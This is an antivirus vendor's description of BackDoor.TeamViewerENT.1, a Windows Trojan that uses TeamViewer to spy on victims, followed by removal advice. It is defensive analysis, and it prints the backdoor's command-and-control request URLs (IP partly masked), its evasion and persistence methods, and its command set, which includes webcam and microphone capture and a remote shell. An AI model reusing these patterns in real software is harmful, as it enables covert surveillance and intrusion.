Library
My library

+ Add to library

Profile

BackDoor.TeamViewerENT.1

Added to the Dr.Web virus database: 2016-08-15

Virus description added:

SHA1:

  • 001c13d05841d2a82229a35fe58235743f1564fe (dropper)
  • 0660cadef21d2061e776e4bcaa6aa4fb48a778be (avicap32.dll)

A backdoor Trojan for Microsoft Windows that is distributed under the name Spy-Agent. It uses the TeamViewer remote control utility components to spy on users. The Trojan has three encrypted blocks of executable code, The blocks are decrypted one by one. The first block is encrypted with BASE64 and XOR, and the others—with BASE64 and RC4.

The Trojan’s payload is placed into the avicap32.dll library. Once launched, the Trojan disables error messaging for the TeamViewer process. When the configuration is read, it is encrypted with a local key and saved to the previous location. The Trojan intercepts function calls in TeamViewer address area and appends all files in its folder with the attributes “system”, “hidden”, and “read only”.

The Trojan has a list of TeamViewer file checksums and regularly checks them with the help of the API MapFileAndCheckSumA function. If certain files or components are missing for normal operation of TeamViewer, the Trojan downloads them from its command and control (C&C) server. To ensure its autorun, the Trojan modifies particular branches of the Windows system registry, selecting branches from HKCU or HKLM. It depends on whether the Trojan has administrative privileges or not.

The Trojan also removes the tvicap32.dll file. Then it launches a separate thread that kills TeamViewer processes if it detects that TASKMGR.EXE or PROCEXP.EXE are running.

The backdoor uses additional plug-ins, which have .pg extension and are stored in the same folder as the Trojan. To launch them, the backdoor bypasses its folder when searching for .pg files. If it detects files with this extension, it launches several threads (depending on the number of detected files), which decrypt these files using RC4 and load them to the memory.

To send a message about the status, the Trojan determines the cursor location and, after some time specified in the configuration, it sends the following request to the command and control server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&sidl=<cur_time>

Where the address is taken from the configuration, <TV_ID> - ID TeamViewer, <botId> is a unique ID of the infected computer, <cur_time> is a current time in the “YYYY-MM-DD hh:mm:ss” format.

Further requests are sent only if the cursor location is changed or if one of the following keys is pressed: VK_RETURN, VK_SPACE, VK_SHIFT. The Trojan then executes the following request:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&eidl=<cur_time>?cidl=<uptime>

Where the address is taken from the configuration, <TV_ID> - ID TeamViewer, <botId> is a unique ID of the infected computer, <cur_time> is a current time in the “YYYY-MM-DD hh:mm:ss” format, —time of the Trojan’s operation in idle mode in seconds (since the last request was sent to the server).

To get instructions from the server, the Trojan waits for a particular number of seconds and then sends the following request to the server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cidl=<uptime>

Where the address is taken from the configuration, <TV_ID> - ID TeamViewer, <botId> is a unique ID of the infected computer, <uptime> is a time of the Trojan’s operation in idle mode in seconds (since the last request was sent to the server).

The Trojan checks the server’s reply for the presence of the “!” character that means the beginning of the command. Then it breaks the line by line arrays that have ‘;’and ‘\r’ separators. The first line in an array is a command.

Once the commands are executed, the following request is sent to the server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cmd=&device=2

The Trojan can execute the following commands:

CommandDescription
shutdownRestart the computer
poweroffTurn off the computer
delprocRemove TeamViewer
restartRelaunch TeamViewer
startaudioStart listening through the microphone
stopaudioStop listening through the microphone
startvideoStart viewing via the web camera
stopvideoStop viewing via the web camera
lexecDownload a file, save it to a temporary folder (%TEMP%) and run it
updefUpdate a configuration file and the backdoor’s executable file
vidIdentify the web camera
cmdConnect to the specified address, run cmd.exe and execute input/output redirection to a remote server
delpgRemove plug-in from disk
uppgDownload/update plug-in
upcfgpgReplace configuration file with one specified in the command
oftvdelRename avicap32.dll to tvicap32.dll
noexitSet parameter value to 1
cfgaudio Set value for corresponding configuration parameter
cfgvideo
cfgnomedia
cfghostfile
cfgwin7kill
cfgxpkill
cfgpgkey
fakedel
cfgpassteam
cfg
cfgnoexit
Cfggenid

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android